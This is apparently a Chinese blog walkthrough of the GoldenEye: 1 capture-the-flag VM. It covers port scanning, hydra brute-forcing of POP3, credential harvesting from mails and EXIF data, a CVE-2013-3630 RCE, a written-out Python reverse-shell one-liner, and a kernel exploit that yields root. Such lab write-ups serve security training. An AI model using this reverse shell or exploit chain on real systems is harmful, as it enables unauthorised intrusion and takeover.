真的学不了一点。。。
真的学不了一点。。。

红队打靶练习:GOLDENEYE: 1

目录

信息收集

1、netdiscover

2、nmap

3、nikto

4、whatweb

5、dirsearch

WEB

web信息收集

hydra爆破

telnet登录

CMS

登录用户xenia

登录用户doak

登录admin

反弹shell

提权

系统信息收集

内核提权

信息收集

1、netdiscover
netdiscover -r 192.168.110.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.110.1   00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.110.2   00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.110.141 00:50:56:35:c7:16      1      60  VMware, Inc.
 192.168.110.254 00:50:56:eb:0a:02      1      60  VMware, Inc.
2、nmap
端口扫描

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.110.141 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 10:22 CST
Nmap scan report for 192.168.110.141
Host is up (0.0018s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:50:56:35:C7:16 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.34 seconds


信息收集

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -O -A -p 25,80,55006,55007 192.168.110.141 --min-rat 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-21 10:23 CST
Nmap scan report for 192.168.110.141
Host is up (0.00046s latency).

PORT      STATE SERVICE     VERSION
25/tcp    open  smtp
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|   Hello:
|     220 ubuntu GoldentEye SMTP Electronic-Mail agent
|     Syntax: EHLO hostname
|   NULL:
|_    220 ubuntu GoldentEye SMTP Electronic-Mail agent
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
55007/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.94SVN%I=7%D=1/21%Time=65AC8041%P=x86_64-pc-linux-gnu%r(N
SF:ULL,32,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent
SF:\r\n")%r(Hello,4D,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Ma
SF:il\x20agent\r\n501\x20Syntax:\x20EHLO\x20hostname\r\n");
MAC Address: 00:50:56:35:C7:16 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.110.141

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.51 seconds
3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.110.141
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.110.141
+ Target Hostname:    192.168.110.141
+ Target Port:        80
+ Start Time:         2024-01-21 10:24:18 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: fc, size: 56aba821be9ed, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /splashAdmin.php: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24.
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems which could not be tested remotely. See: https://seclists.org/bugtraq/2002/Jul/262
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2024-01-21 10:24:35 (GMT8) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.110.141/
WhatWeb report for http://192.168.110.141/
Status    : 200 OK
Title     : GoldenEye Primary Admin Server
IP        : 192.168.110.141
Country   : RESERVED, ZZ

Summary   : Apache[2.4.7], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.7 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.7 (Ubuntu) (from server string)

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sun, 21 Jan 2024 02:25:39 GMT
        Server: Apache/2.4.7 (Ubuntu)
        Last-Modified: Thu, 26 Apr 2018 06:29:22 GMT
        ETag: "fc-56aba821be9ed-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 195
        Connection: close
        Content-Type: text/html
5、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.110.141 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.110.141/_24-01-21_10-45-33.txt

Target: http://192.168.110.141/

[10:45:33] Starting:

Task Completed


啥也没有!

WEB

web信息收集

红队打靶练习:GOLDENEYE: 1_第1张图片

红队打靶练习:GOLDENEYE: 1_第2张图片

红队打靶练习:GOLDENEYE: 1_第3张图片

在源码中我们找到了一个js文件,在js文件中得到一串编码字符,是html编码!

红队打靶练习:GOLDENEYE: 1_第4张图片

这个就是密码

Boris:InvincibleHack3r

红队打靶练习:GOLDENEYE: 1_第5张图片

试了半天,小写用才能登录成功!

红队打靶练习:GOLDENEYE: 1_第6张图片

红队打靶练习:GOLDENEYE: 1_第7张图片

hydra爆破
我们对靶机的pop服务进行爆破


然后使用telnet登录。
telnet登录

红队打靶练习:GOLDENEYE: 1_第8张图片

红队打靶练习:GOLDENEYE: 1_第9张图片

里面一共有三封邮件。

1、鲍里斯,我是管理员。你可以在这里与同事和学生进行电子交流。我不会扫描电子邮件的安全风险,因为我信任你和这里的其他管理员。

2、鲍里斯,我可以破解你的密码!

3、Boris,
你与我们辛迪加的合作将获得巨大回报。附件是GoldenEye的最终访问代码。将它们放在此服务器根目录中的隐藏文件中,然后从此电子邮件中删除。这些acces代码只能有一组,我们需要保护它们以供最终执行。如果他们被找回并捕获,我们的计划将崩溃并付诸东流!
一旦Xenia进入训练场地并熟悉GoldenEye终端代码,我们将进入最后阶段。。。。
PS-保持安全,否则我们会受到威胁。

在查看邮件的时候发现其他用户名

natalya、alec

红队打靶练习:GOLDENEYE: 1_第10张图片

红队打靶练习:GOLDENEYE: 1_第11张图片

又是两封信。。。。

1、纳塔利娅,拜托你别再破坏鲍里斯的密码了。此外,您还是GNO的培训主管。一旦有学生被指定给你,我会给你发电子邮件。
此外,要小心可能的网络漏洞。我们有情报称,一个名叫Janus的犯罪集团正在追捕GoldenEye。


2、好的,Natalyn,我有一个新学生给你。由于这是一个新系统,如果你看到任何配置问题,请让我或boris知道,特别是它与安全有关。。。即使不是,也只是打着“安全”的幌子进入。。。它将使变更单升级,而不需要太多麻烦:)
好的,用户信誉是:
用户名:xenia
密码:RCP90ulez!
Boris验证了她是一个有效的承包商,所以只需创建帐户即可,好吗?
如果你在内部域名之外没有URL:severnaya-station.com/gnocertdir
**确保编辑您的主机文件,因为您通常在网络外远程工作。。。。
由于您是Linux用户,只需将此服务器IP指向/etc/hosts中的severnaya-station.com即可。

我们需要在 /etc/hosts 文件中加入域名即可!

并且我们得到用户名以及密码:   xenia   RCP90rulez!

红队打靶练习:GOLDENEYE: 1_第12张图片

CMS

登录用户xenia

红队打靶练习:GOLDENEYE: 1_第13张图片

红队打靶练习:GOLDENEYE: 1_第14张图片

又发现一个用户

作为我们GoldenEye培训的新承包商,我欢迎您。一旦您的帐户完成,您的仪表板上将显示更多课程。如果你有任何问题,请通过电子邮件给我发消息,不要在这里。
我的电子邮件用户名是。。。
doak
谢谢您,
干杯,
Doak博士“博士”
培训科学家-高级培训操作主管
GoldenEye运营中心部门
14级-NO2-id:998621-1334
校区4,57号楼,6区8楼,立方体1007
电话555-193-826
手机555-836-0944
办公室555-846-9811
个人555-826-9923
电子邮件:doak@
请在打印前回收,保持绿色,也为公司省钱!
“有一件事叫Good Grief。问问Charlie Brown就知道了”——某个人
“你投丢了100%的球,你没有投”-韦恩G。
登录用户doak
我们使用hydra爆破

红队打靶练习:GOLDENEYE: 1_第15张图片

红队打靶练习:GOLDENEYE: 1_第16张图片

用户名密码: dr_doak 4England!

红队打靶练习:GOLDENEYE: 1_第17张图片

发现文件!

红队打靶练习:GOLDENEYE: 1_第18张图片

007,
我能够通过clear txt在cr3ds中捕获此应用程序adm1n。
GoldenEye服务器中大多数网络应用程序中的文本都会被扫描,所以我无法在此处添加cr3dentials。
这里有一些有趣的东西:/dir007key/for-007.jpg
正如你所知,RCP-90比任何其他武器都要好得多,而杀人许可证是唯一的游戏方式。

提示又个jpg照片!

红队打靶练习:GOLDENEYE: 1_第19张图片

红队打靶练习:GOLDENEYE: 1_第20张图片

┌──(root㉿ru)-[~/kali]
└─# exiftool for-007.jpg
ExifTool Version Number         : 12.67
File Name                       : for-007.jpg
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2018:04:25 08:40:02+08:00
File Access Date/Time           : 2024:01:25 11:40:45+08:00
File Inode Change Date/Time     : 2024:01:25 11:40:22+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : GoldenEye
Resolution Unit                 : inches
Software                        : linux
Artist                          : For James
Y Cb Cr Positioning             : Centered
Exif Version                    : 0231
Components Configuration        : Y, Cb, Cr, -
User Comment                    : For 007
Flashpix Version                : 0100
Image Width                     : 313
Image Height                    : 212
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 313x212
Megapixels                      : 0.066

得到:eFdpbnRlcjE5OTV4IQ==

┌──(root㉿ru)-[~/kali]
└─# echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d
xWinter1995x!


应该是密码!  不用说一定是admin的!

红队打靶练习:GOLDENEYE: 1_第21张图片

登录admin

红队打靶练习:GOLDENEYE: 1_第22张图片

反弹shell

红队打靶练习:GOLDENEYE: 1_第23张图片

这个版本是存在RCE漏洞的!(CVE-2013-3630)

红队打靶练习:GOLDENEYE: 1_第24张图片

使用python进行反弹shell

payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

红队打靶练习:GOLDENEYE: 1_第25张图片

红队打靶练习:GOLDENEYE: 1_第26张图片

只需要点击拼音检查,我们即可触发shell!

提权

红队打靶练习:GOLDENEYE: 1_第27张图片

红队打靶练习:GOLDENEYE: 1_第28张图片

系统信息收集
www-data@ubuntu:/home$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home$

www-data@ubuntu:/home$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.1 LTS
Release:        14.04
Codename:       trusty
www-data@ubuntu:/home$

www-data@ubuntu:/home$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@ubuntu:/home$


www-data@ubuntu:/home$ ls -al /etc/passwd /etc/shadow
ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root   1426 Apr 28  2018 /etc/passwd
-rw-r----- 1 root shadow 1081 Apr 28  2018 /etc/shadow

www-data@ubuntu:/home$ cat /etc/passwd | grep "/home" | grep "nologin"
cat /etc/passwd | grep "/home" | grep "nologin"
boris:x:1000:1000:boris,,,:/home/boris:/usr/sbin/nologin
natalya:x:1002:1002:,,,:/home/natalya:/usr/sbin/nologin
doak:x:1001:1001:,,,:/home/doak:/usr/sbin/nologin
内核提权

我们发现机器存在内核提权漏洞!我们利用一下!

红队打靶练习:GOLDENEYE: 1_第29张图片

发现没有gcc  , 我们使用cc!修改poc!

红队打靶练习:GOLDENEYE: 1_第30张图片

我们把这个gcc编译修改成cc编译!

www-data@ubuntu:/tmp$ cc 37292.c -o exp
cc 37292.c -o exp
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.

www-data@ubuntu:/tmp$ ls -al
ls -al
total 48
drwxrwxrwt  5 root     root      4096 Jan 24 22:50 .
drwxr-xr-x 22 root     root      4096 Apr 24  2018 ..
drwxrwxrwt  2 root     root      4096 Jan 25  2024 .ICE-unix
drwxrwxrwt  2 root     root      4096 Jan 25  2024 .X11-unix
-rw-rw-rw-  1 www-data www-data  4968 Jan 24 22:49 37292.c
-rwxrwxrwx  1 www-data www-data 13773 Jan 24 22:50 exp
-rw-------  1 www-data www-data     4 Jan 24 22:22 tinyspellUTJFa9
drwx------  2 root     root      4096 Jan 25  2024 vmware-root

www-data@ubuntu:/tmp$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

你可能感兴趣的:(红队渗透靶机,网络安全)

  • 山东大学小树林支教调研团青青仓木队——翟晓楠 山东大学青青仓木队
    过了半年,又一次启程,又一次回到支教的初心之地。比起上一次的试探与不安,我更多了一丝稳重与熟练。心境、处境也都随着半个学期的过去而变得不同,半个学期中,身体上的,心理上的,太多的逆境让我变得步履维艰,曲曲折折,弯弯绕绕,我仿佛打不起精神,没有胃口,没有动力。感觉走的不顺畅的时候,支教这个旅程,给了我力量。自告奋勇承担起队长这一职务的我,从组织时的复杂和困难的经历,协调各种问题,从无到有,和校长和队
  • 2019-05-13 王健_100a
    【撒下18:2】大卫打发军兵出战,分为三队:一队在约押手下,一队在洗鲁雅的儿子约押兄弟亚比筛手下,一队在迦特人以太手下。大卫对军兵说:“我必与你们一同出战。”解释:大卫检阅部队,将它分成三队,每队由一位元帅统领;约押与兄弟亚比筛,并迦特人以太共同指挥。大卫想与他们一同出战!应用:作为领袖与军兵一起出战是很重要。领袖在事奉中与信徒一起,领袖在任何的环境里与信徒一起走过。我们要同心协力为主而战。祷告:
  • 《大兴安岭猎人传说》今年最好看的东北鬼怪故事,很优秀 一部电影
    《大兴安岭猎人传说》是最新上映于愚人节的网剧,别看是网剧却远超出我的个人预料。该片由民俗故事改编,这点就很吸引人,因为民俗故事口口相传,比那些编造而成的鬼故事更具有了真实性,网大做的电影还不错哦,如果可以我打四星好评。大兴安岭的故事我们经常听老人提起,那里有原始大森林,物产丰富,更流传着精灵怪物的传说。什么红黄白柳灰,出马仙、人参娃娃的故事层出不穷,以大兴安岭为背景的故事真不少。可很多鬼片看到最后
  • 2018-12-07 旅一06丁琪琪
    旅管一班6组学号链接06丁琪琪16家国鑫26孟令慧30王思宁36温红丽46朱赵筱楠
  • 红手套节 马小媛为中国城市环卫者公益发声:今天我手红 疏狂君
    #红手套节#公益活动,线头公益以及同多方资源的共同努力我们邀请到了线头公益大使马小媛马小媛,1993年5月3日出生于江苏省南京市,中国内地新生代女演员。2015年马小媛参演网剧《余罪》,饰演警校校花安嘉璐的闺蜜。2016年马小媛主演系列电影《丽人保镖》中女一号林欢馨,正式出道。此后,马小媛陆续接演了电视剧《警花与警犬2》,在网剧《你美丽李美丽》中担任女主角李美丽。拂晓,当你还在睡梦中时,这座城跟你
  • 4.C_数据结构_队列 荣世蓥 数据结构数据结构
    概述什么是队列:队列是限定在两端进行插入操作和删除操作的线性表。具有先入先出(FIFO)的特点相关名词:队尾:写入数据的一段队头:读取数据的一段空队:队列中没有数据,队头指针=队尾指针满队:队列中存满了数据,队尾指针+1=队头指针循环队列1、基本内容循环队列是以数组形式构成的队列数据结构。循环队列的结构体如下:typedefintdata_t;//队列数据类型#defineN64//队列容量typ
  • 离奇的投毒案(七) 蜗居山人
    (接上文)庭审很快开始了,李妹坐在旁听席的第一排,她想看看丈夫到底是不是害死儿女的凶手。公诉人宣读起诉书后,审判长询问张春对起诉书指控的犯罪事实是否承认,张春矢口否认,当庭翻供。李妹心中一阵得意:“我早就判断丈夫不是凶手!刑警队弄错了,这下看武队长如何收场!这可是公开审理。”审判长问:“你怎么在公安机关承认犯罪事实呢?”“他们刑讯逼供,没有办法我只能承认。”李妹心里嘟囔:“俺丈夫爱我和孩子胜过爱他
  • 计算机木马详细编写思路 小熊同学哦 php开发语言木马木马思路
    导语:计算机木马(ComputerTrojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
  • 2021-11-18 安安303
    刘红雅中原焦点团队分享第135天筑基第4课社会心理学接上一课,心理现象。需要和动机所有的动机行为受需要的影响,现在的孩子很多方面不需要,是因为得到的太多需要使机体内部不平衡的状态,现在很多需要满足的过多,是“厌”,孩子要越用越有用,没有用到自己,自己没有价值感成就感,他就不需要开发自己的潜力。对自己和孩子的生活留白不断的学习成长,实现自己。所有有情绪的地方是触动了需求,需求没有被满足,当一个人知道
  • 古诗词欣赏 :杨万里的秋凉晚步 一日进步一点
    1、原文:秋凉晚步[宋]杨万里秋气堪悲未必然,轻寒正是可人天。绿池落尽红蕖却,荷叶犹开最小钱。2、译文:秋天真的是让人感觉悲凉的季节吗?未必是这样吧,轻微的寒冷,正是最让人感觉舒适的天气,碧绿的荷叶虽然快要落完了,但是粉红的荷花却还在盛开,新长出的荷叶就像最小的铜钱那么大。3、注释可人:合人意。红蕖(音同“渠”):荷花。却:开尽。最小钱:新出荷叶才象小铜钱那么大。4、赏析:向来诗人容易悲愁,秋风飒
  • 信息系统安全相关概念(下) YuanDaima2048 基础概念课程笔记安全
    文章总览:YuanDaiMa2048博客文章总览上篇指路:信息系统安全相关概念(上)信息系统安全相关概念[下]信息系统风险评估安全风险评估信息系统等级保护网络安全法等级保护等级保护工作流程环境安全信息系统风险评估安全风险评估对信息系统整体安全态势的感知和对重大安全事件的预警,实现“事前能预防,事中能控制,事后能处理”。安全风险组成的四要素:信息系统资产(Asset)信息系统脆弱性(Vulnerab
  • 少年冯菊芬(八) 一杯老酒
    七,愿做红鲤救灾民有一年夏天,本地大旱,就连营庄北边的鲁兰河,据说在1909年曾经因为发大水,导致鲁兰河两岸的连片村庄先后被洪水煙没,但是干旱的这一年,鲁兰河都干涸见底了,何况附近所有的小河。烈日之下,时常可见很多庶民百姓聚集在一起,烧香拜佛,试图祈祷感化上苍。说来奇怪,就在大埠街有一口古井特别神奇,即便是严重干旱的那一年,古井里的水位也没有大的变化,往往是一段时间,因为附近村民来往取水频繁,古井
  • 90天读书分享76——家为什么会伤人 韧2018
    图片发自App今天分享的书籍是《家为什么会伤人》,作者是武志红,著名的心理学家,畅销书作家。本书是讲述中国家庭的文化的一些缺陷造成的种种不良后果,我将分享书中家庭和婚姻中的误区和正确的做法。由于我们在家庭和婚姻中没有采取正确做法,走入了误区,会给婚姻和家庭带来巨大的伤害,而且这种伤害会可能会对子女造成影响,会不断延续下去,造成悲剧的反复发生。现在来看看婚姻中存在误区:第一个误区是不以夫妻关系为家庭
  • 【Death Note】网吧战神之7天爆肝渗透测试死亡笔记_sqlmap在默认情况下除了使用 char() 函数防止出现单引号 2401_84561374 程序员笔记
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!特殊服务端口2181zookeeper服务未授权访问
  • 小时候的“年”(四) 春风拂林绿
    初一早起我们这儿叫“起五更(jing)”,大约是早晨五、六点钟左右,每家都不一样,但大约是这样一个时间。早晨吃饺子前也要放一支鞭,一般听到各家的鞭炮声,就能知道自己家里起的早还是晚了。关于吃饺子的习俗前面已经说过,在此就不加赘述了。吃完饺子后,就要开始拜年了。未出嫁的女孩子是无须去拜年的,一般都是一大家人,男人们一队,媳妇们一队,挨门挨户的去给自家的长辈们拜年。也就是一群人一起给长辈们磕头,过年磕
  • 剧本杀谁是凶手《红瞳消逝之时》凶手是谁剧透+真相答案复盘解析攻略 VX搜_奶茶剧本杀
    本文为谁是凶手《红瞳消逝之时》剧本杀测评+部分真相复盘,获取完整真相复盘只需两步:①、关注微信公众号【奶茶剧本杀】→②、回复谁是凶手《红瞳消逝之时》即可获取查看谁是凶手《红瞳消逝之时》剧本杀真相答案复盘+凶手剧透:以下是玩家评测+部分关键证据,凶手,时间线,复盘解析,推理逻辑--------------------------------------------------------------
  • 感恩日记 美玲_
    1,感恩小妹一大早,就发来了给妈妈洗浴后的照片。看到老妈平安健康,心中很是喜悦。祈愿老妈~在世的菩萨,健健康康平平安安,有妈在,家就在。让在外的儿女逢年过节有归心似箭的心情。2,感恩姚老师咖啡冥想研究生滴2期的义工团队,及时通报我参加学习事宜。让我这次学习不再,毫无准备,手忙脚乱。做好学习安排。3,感恩永红接受我的邀请,参与姚老师咖啡冥想研究生延续班,4,感恩丰盛10门的素娜,提议的语音好方法,更
  • 我的红本绿本 红海儿
    帮妈收拾屋子,洗被擦灰,翻箱倒柜。偶然,发现一处新大陆,我小学,中学的毕业证书。二十多年啦,我老妈还替我保管得挺好,没破相,没断篇。我不起眼的成绩单红色绿色还是那样鲜艳,好像我还没长大的模样。把本子翻开,我的照片映入眼帘,诶呦,这是谁家的小丫头啊?怎么这么招人稀罕呢?哈哈哈,我与本子对视,要笑掉下巴了。上面还有老师的钢笔字评语,被岁月褪淡了些许颜色,是姓李还有姓王,姓孙,姓闫……很多老师的名字还在
  • 《晕乎乎的米》 94min呀
    图片发自App今天我们渝川茶叶公司的孔总生日,忙了一下午亲手给我大爹现学现做了一束手工花,哈哈哈,挺有成就感的。很开心师傅和师兄能赶过来给他一起庆祝生日,特别有心还给带了礼物,感谢师傅师兄以及一木队的姐妹们一直以来对我们渝川公司的支持,感恩!今天高兴就喝了点酒,结果就喝晕了,这酒量真是没谁了。。。。。刚准备回家结果酒店推车上一瓶饮料掉下来扎扎实实地砸在了脚上,脚趾直接就乌了。让我心疼自己一秒。。。
  • 使用游戏盾就可以保证游戏不被攻击吗? 德迅云安全小李 游戏网络服务器安全网络安全
    游戏服务器不管是个人的还是企业的,被攻击都是,很常见的,在所难免的。特别是游戏新上线时,都要承受的住哪些外来压力,玩家突然猛增,被攻击等等。如果承受不住可能会直接宣布游戏倒闭。这里我们一起来说说怎么用游戏盾防御游戏服务器。首先我们要了解的一点是,什么是"游戏盾"游戏盾是针对游戏行业所推出的高度可定制的网络安全解决方案,除了能针对大型DDoS攻击(T级别)进行有效防御外,还能彻底解决游戏行业特有的T
  • 好奇 oulan
    试着把室温调成16度,试着把蚊账尽可能调成无缝隙模式,试着送排着队等着入夜来一波攻击模式的蚊子一直向西。昨天晚上的梦境就空幻而不可记。早晨醒来的时候鸟歌雀舞,这边山上一声,那边山上一声。走到屋子外面,连眼镜都因为热浪袭来而模糊不清。水面倒映着铁塔,小燕子在水面饱餐着飞虫。很好奇这不熟悉的世界,是什么让鱼儿秀着水花,是什么让鲜花爬满窗棱。一切都是好的开始,一会就去看山顶的微红。早安,世界。早安,未来
  • 【原创小说】总是东风错丨第十三章 郭勒的鱼
    郑重声明:文章系原创非首发,首发平台:头条号,ID:郭勒的鱼,文责自负。天刚亮,府外面一片嘈杂,门被拍的山响,这一夜苏府惊魂,人们吓得如同惊弓之鸟,听到这敲门声,连苏福都不敢贸然开门。趴在门缝往外一看,是大太太的哥哥舅姥爷虞南基来了,连忙着人开门,不但是虞南基来了,还领来一队三十多个全副武装的士兵。南竹看着哥哥。嘴扁了扁,蓦然鼻子一酸哭得泣不成声,虞南基很诧异。他这个妹妹他了解,外表的柔婉其实都是
  • 韩愈《题榴花》:倾听花落的声音 墙头草说
    无论有没有人欣赏,时节一到,花儿自然就会开放,这是自然的规律。但是多情的人们总以为花儿是为自己而开,于是在赏花之时,或惊叹于造化之功,或沉醉于迷人花香,或伤悼于满地落红……唐代诗人韩愈在观赏石榴花时,也生发出深沉的感慨,于是写下了《题榴花》一诗,原文如下:五月榴花照眼明,枝间时见子初成。可怜此地无车马,颠倒青苔落绛英。“五月榴花照眼明”,五月如火的石榴花映入眼帘格外鲜明。五月份,正是石榴花开得正盛
  • 来吧!唤醒你的生命力|红蛇波7脉轮清理疗愈与曼陀罗书写的完美结合 温温说玛雅
    图片来自溫梓年过半百的我自从实现了自由职业的生活以来,时间充裕节奏却更加紧密。几年身心灵的探索与对时间法则体系知识的学习,已经使我剥离了时间是金钱的价值观,时间不再是我用来赚钱的工具,而是我体验活着的艺术和载体,它变的具有可长可短的弹性,不再是固定一成不变的刻度。生命也不再是沉闷亢长令人喘不过气来的窒息,我感知着它每一刻都在生长的美妙,我迷恋这样的感觉。告别了那种时间永远都不够用、看似一刻都不能停
  • 2018-07-05安静 天高地阔心飞扬
    梁素红,焦点网络九期持续分享第131天(275)舞钢我已经能做到早上不在饭桌上就开始不停的对爱人说话了,真的很难得,也许爱人觉得自己的耳朵根清净了很多。中午从老家回来的路上,我又像以前,说了一路。都是些什么事情呢?也许早说过的,也许是猜测的,还有加上自己的评论,爱人一句话也不说,只有我一个人的独白,还像自言自语。现在我在审视自己的这个问题。我前一段时间怎么能做到,安静的不说话,我是怎么做到的?做到
  • [面试高频问题]关于多线程的单例模式 朱玥玥要每天学习 java单例模式开发语言
